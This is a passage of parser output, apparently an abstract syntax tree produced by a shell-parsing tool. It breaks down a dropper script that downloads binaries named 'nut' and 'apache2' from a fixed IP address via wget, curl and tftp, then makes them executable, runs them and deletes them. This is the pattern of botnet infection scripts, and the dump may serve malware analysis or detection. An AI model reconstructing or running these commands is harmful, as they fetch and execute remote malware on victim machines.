    WordNode(lineno=11, pos=(1862, 1864), word='rm'),
    WordNode(lineno=11, pos=(1865, 1868), word='-rf'),
    WordNode(lineno=11, pos=(1869, 1871), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1872, 2051), parts=[
  CommandNode(lineno=12, pos=(1872, 1879), parts=[
    WordNode(lineno=12, pos=(1872, 1874), word='cd'),
    WordNode(lineno=12, pos=(1875, 1879), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1880, 1882)),
  CommandNode(lineno=12, pos=(1883, 1894), parts=[
    WordNode(lineno=12, pos=(1883, 1885), word='cd'),
    WordNode(lineno=12, pos=(1886, 1894), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1895, 1897)),
  CommandNode(lineno=12, pos=(1898, 1905), parts=[
    WordNode(lineno=12, pos=(1898, 1900), word='cd'),
    WordNode(lineno=12, pos=(1901, 1905), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1906, 1908)),
  CommandNode(lineno=12, pos=(1909, 1917), parts=[
    WordNode(lineno=12, pos=(1909, 1911), word='cd'),
    WordNode(lineno=12, pos=(1912, 1917), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1918, 1920)),
  CommandNode(lineno=12, pos=(1921, 1925), parts=[
    WordNode(lineno=12, pos=(1921, 1923), word='cd'),
    WordNode(lineno=12, pos=(1924, 1925), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1925, 1926)),
  CommandNode(lineno=12, pos=(1927, 1955), parts=[
    WordNode(lineno=12, pos=(1927, 1931), word='wget'),
    WordNode(lineno=12, pos=(1932, 1955), word='http://51.15.48.238/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1955, 1956)),
  CommandNode(lineno=12, pos=(1957, 1988), parts=[
    WordNode(lineno=12, pos=(1957, 1961), word='curl'),
    WordNode(lineno=12, pos=(1962, 1964), word='-O'),
    WordNode(lineno=12, pos=(1965, 1988), word='http://51.15.48.238/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1988, 1989)),
  CommandNode(lineno=12, pos=(1990, 2018), parts=[
    WordNode(lineno=12, pos=(1990, 1994), word='tftp'),
    WordNode(lineno=12, pos=(1995, 2007), word='51.15.48.238'),
    WordNode(lineno=12, pos=(2008, 2010), word='-c'),
    WordNode(lineno=12, pos=(2011, 2014), word='get'),
    WordNode(lineno=12, pos=(2015, 2018), word='nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2018, 2019)),
  CommandNode(lineno=12, pos=(2020, 2032), parts=[
    WordNode(lineno=12, pos=(2020, 2025), word='chmod'),
    WordNode(lineno=12, pos=(2026, 2028), word='+x'),
    WordNode(lineno=12, pos=(2029, 2032), word='nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2032, 2033)),
  CommandNode(lineno=12, pos=(2034, 2039), parts=[
    WordNode(lineno=12, pos=(2034, 2039), word='./nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2039, 2040)),
  CommandNode(lineno=12, pos=(2041, 2051), parts=[
    WordNode(lineno=12, pos=(2041, 2043), word='rm'),
    WordNode(lineno=12, pos=(2044, 2047), word='-rf'),
    WordNode(lineno=12, pos=(2048, 2051), word='nut'),
  ]),
])
ListNode(lineno=13, pos=(2052, 2255), parts=[
  CommandNode(lineno=13, pos=(2052, 2059), parts=[
    WordNode(lineno=13, pos=(2052, 2054), word='cd'),
    WordNode(lineno=13, pos=(2055, 2059), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2060, 2062)),
  CommandNode(lineno=13, pos=(2063, 2074), parts=[
    WordNode(lineno=13, pos=(2063, 2065), word='cd'),
    WordNode(lineno=13, pos=(2066, 2074), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2075, 2077)),
  CommandNode(lineno=13, pos=(2078, 2085), parts=[
    WordNode(lineno=13, pos=(2078, 2080), word='cd'),
    WordNode(lineno=13, pos=(2081, 2085), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2086, 2088)),
  CommandNode(lineno=13, pos=(2089, 2097), parts=[
    WordNode(lineno=13, pos=(2089, 2091), word='cd'),
    WordNode(lineno=13, pos=(2092, 2097), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2098, 2100)),
  CommandNode(lineno=13, pos=(2101, 2105), parts=[
    WordNode(lineno=13, pos=(2101, 2103), word='cd'),
    WordNode(lineno=13, pos=(2104, 2105), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2105, 2106)),
  CommandNode(lineno=13, pos=(2107, 2139), parts=[
    WordNode(lineno=13, pos=(2107, 2111), word='wget'),
    WordNode(lineno=13, pos=(2112, 2139), word='http://51.15.48.238/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2139, 2140)),
  CommandNode(lineno=13, pos=(2141, 2176), parts=[
    WordNode(lineno=13, pos=(2141, 2145), word='curl'),
    WordNode(lineno=13, pos=(2146, 2148), word='-O'),
    WordNode(lineno=13, pos=(2149, 2176), word='http://51.15.48.238/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2176, 2177)),
  CommandNode(lineno=13, pos=(2178, 2210), parts=[
    WordNode(lineno=13, pos=(2178, 2182), word='tftp'),
    WordNode(lineno=13, pos=(2183, 2195), word='51.15.48.238'),
    WordNode(lineno=13, pos=(2196, 2198), word='-c'),
    WordNode(lineno=13, pos=(2199, 2202), word='get'),
    WordNode(lineno=13, pos=(2203, 2210), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2210, 2211)),
  CommandNode(lineno=13, pos=(2212, 2228), parts=[
    WordNode(lineno=13, pos=(2212, 2217), word='chmod'),
    WordNode(lineno=13, pos=(2218, 2220), word='+x'),
    WordNode(lineno=13, pos=(2221, 2228), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2228, 2229)),
  CommandNode(lineno=13, pos=(2230, 2239), parts=[
    WordNode(lineno=13, pos=(2230, 2239), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2239, 2240)),
  CommandNode(lineno=13, pos=(2241, 2255), parts=[
    WordNode(lineno=13, pos=(2241, 2243), word='rm'),
    WordNode(lineno=13, pos=(2244, 2247), word='-rf'),
    WordNode(lineno=13, pos=(2248, 2255), word='apache2'),
  ]),
])
